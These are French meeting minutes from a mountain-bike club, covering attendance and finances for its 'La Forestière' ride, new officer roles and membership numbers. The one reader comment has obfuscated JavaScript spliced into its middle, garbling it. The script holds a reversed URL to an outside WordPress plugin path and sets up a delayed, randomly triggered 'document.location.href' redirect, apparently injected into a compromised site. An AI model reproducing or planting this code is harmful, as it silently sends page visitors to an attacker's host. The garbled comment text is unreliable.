Réunion du 09 mars 2018

Réunion du 09 mars 2018

Salle des associations de Chepniers

 

Ce soir nous sommes une vingtaine d’Oranges pleins de vitamines

 

Ordre du jour :

 

  • Bilan de La forestière :
    • Compte rendu présenté par notre président et notre secrétaire : participation, retours, remerciements . . .
    • Bilan financier présenté par notre trésorier : ce que ça a rapporté, ce que ça a coûté
    • Les points positifs et à améliorer présentés par notre secrétaire : retours des participants, retours des bénévoles
  • La prise de fonction de Marco et de Sébastien
  • Les questions divers :

 

1) Bilan de La forestière :

  • Le mot du président : C’est n’est pas moins de 1165 participants qui sont venus profiter de nos singles et chemins spécialement préparés pour l’occasion.

Les vététistes se répartissant de la façon suivante :

  • Sur le Raid : 76 vtt
  • Sur le parcours 55 kms : 192 participants ;
  • Sur le parcours 42 kms : 124 participants ;
  • Sur le parcours 35 kms : 223 participants ;
  • Sur le parcours 25 kms : 223 participants ;
  • Les marcheurs se répartissant de la façon suivante :
  • Sur le parcours 15 kms : 175 participants ;
  • Et enfin sur le parcours 10 kms : 152  participants.

Donc un beau succès pour cette première manifestation au pur jus d’Oranges sans édulcorant ni conservateur.

Les innovations, tel que le Raid et l’inscription sur internet, se sont parfaitement intégrées dans la mécanique déjà bien huilée et les retours sont plus que positifs.

Comme le dit notre président, c’est grâce à une équipe soudée depuis le premier gros nettoyage et l’ouverture de JOYEUX jusqu’au balisage final du dernier week-end que l’on peut mesurer le travail accompli. Chacun a fait sa part de travail et les secteurs attribués ont été travaillés et balisés par les différentes équipes formées comme prévu en réunion et heureusement car la météo du dernier week-end ne nous a pas facilitée les choses.

Avec en plus ce fameux RAID, la FORESTIERE à pris une toute autre dimension, les Raideurs sont venus de  très loin : Biarritz, Limoge, Toulouse, Bordeaux etc. Et pas seuls, souvent accompagnés de leurs amis randonneurs plus cool mais vététiste quand même. C’est ça le vtt et ce n’est pas 76 participants de plus que nous avons gagné au final mais bien plus. Avec tout ça LA FORESTIERE gagne encore en notoriété et se place gentiment dans le calendrier des grandes.

Tout le monde c’est vraiment rendu compte de la qualité du travail réalisé et les retours positifs et félicitations reçus en sont la preuve.

Notre président et le bureau en entier tiennent à remercier tous les Oranges motivés et impliqués, tous les bénévoles annuels ou occasionnels tous les propriétaires toutes les municipalités . . . toutes ces personnes qui gravitent autour du « Oranges mécaniques team ». Ces personnes qui donnent de leur temps mais plus encore font avancer l’esprit que nous voulons insuffler, nous les Oranges du premier jour, dans ce club qui dépasse largement le cadre du vtt du sport ou de la compétition.

 

Nous sommes un club de vélo tout terrain, route, randonneurs, compétiteur du super costaud au randonneur occasionnel mais l’essentiel doit rester dans cette envie de pratiquer ensemble notre activité préférée et de la partager avec le plus grand nombre dans le plus grand respect des uns et des autres.

 

  • Bilan financier : grâce à la fréquentation et au travail de tous nous avons pu dégager quelques bénéfices de cette journée. Nos différents partenaires, Intermarché, « Proxi Chez Rodolphe » etc. nous ont permis de proposer des ravitaillements gargantuesques tout en maintenant nos dépenses dans le raisonnable.

Ceci va nous permettre d’envisager les prochaines dépenses, tel que du matériel, les frais pour la « Freddy-nègue », etc . . . de façon plus sereine.

 

  • Les points positifs et à améliorer

Comme l’objectif est de proposer toujours mieux, voici pêle-mêle, quelques idée sur les choses à améliorer :

Inscriptions :

–  préparer les tables des inscriptions la veille avec les affiches … préparer les poches du raid

–  1 personne par type de parcours 1 vtt 25, 1 vtt35, 1 vtt 45, 1 vtt 55, 1 raid,1 pour les poches du raid, 1 marcheur 10, 1 marcheur 15 1 qui s’occupe de l’ensemble

– préparer les cartes la veille

– 1 plaque de couleur différente par discipline ou avoir toutes les mêmes de la même couleur sauf raid et marcheur

– avoir un bon nombre de plaque (c’est plus facile maintenant étant donné que nous savons le nombre de participants)

Autres :

– Photo : avoir 1 personne minimum qui couvre les VTT et 1 personne minimum qui couvre les marcheurs

– se tenir sur les horaires des départs et faire partir les bons groupent afin de ne pas avoir de bouchons sur les 1ers singles

– ajouter les dénivelés sur les cartes

– avoir un réparateur de VTT car on nous a demandé des pièces au départ. Chambre à air, collet de selle

Ravitaillement

Jour avant :

Couper les oranges en morceaux dans des bassines.

Remplir les bouteilles : – sirop de pêches,… + eau.

Couper le chocolat.

Jour J :

  • Mettre une ou des jerricans d’eau sur une table (Remplissage des bidons des participants).
  • Graisser le pâté au chaud avant le ravito.
  • A « la Forestière » mettre des feux de camps dans des bidons de 200 litres coupés,
  • Emprunter pour essais 1 Massicot de cantine pour couper le pain

 

 

2) Les prises de fonctions de Marco et Sébastien

Suite à l’appel lancé par le président lors de la dernière réunion sur les postes d’adjoint, nous  avons eu deux volontaires pour venir en aide aux deux fonctions de vice-président et trésorier adjoint.

Pour la première fonction c’est Marco qui se porte volontaire à ce poste. Et comme c’est un gars plein de courage et de ressources il prend en charge également la gestion du pole vêtements. Cela concerne la boutique mais surtout nos équipements.

Si vous avez des commandes à passer c‘est donc à lui qu’il faut s’adresser via l’adresse du bureau ( bureau@orangesmecaniquesteam.fr ), tarif sur le site. La première commande sera envoyée le 30 mars prochain, donc dépêchez vous de faire votre choix.

Afin qu’il puisse fonctionner en toute transparence et autonomie, un compte va être ouvert.

Pour la deuxième fonction, c’est Sébastien « Fat-toujours » qui s’y colle. Boulot en perspective, hé oui nous sommes riches maintenant ! ! !

Pour la fonction de secrétaire adjoint, le poste reste vacant et la nécessite de le pourvoir devient urgente.

 

3) Questions divers :

Actuellement nous sommes 55 Oranges :

34 adhérents :

  • 3 femmes
  • 4 jeunes
  • 27 hommes
  • 1 chien

21 licenciés UFOLEP

  • 1 jeune compétiteur
  • 1 jeune randonneur
  • 4 randonneurs
  • 1 compétitrice
  • 14 compétiteurs

 

La renégociation du contrat d’assurance est en cours

Afin de lui éviter de faire l’avance voir de payer de sa poche, il est convenu que, pour nous assurer de bon petits ravitos dont elle a le secret, Nicole fasse ses courses à Proxi Montlieu, les fasse noter et notre trésorier passera les régler.

 

François

Share This:

1 Comment

  1. Bien François tjrs du super boulot …vraiment respect c toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toi le pilier des Oranges… que de chemin parcouru depuis cette première rencontre ds les singles de Montlieu…
    Merci

Poster un Commentaire

Votre adresse de messagerie ne sera pas publiée.


*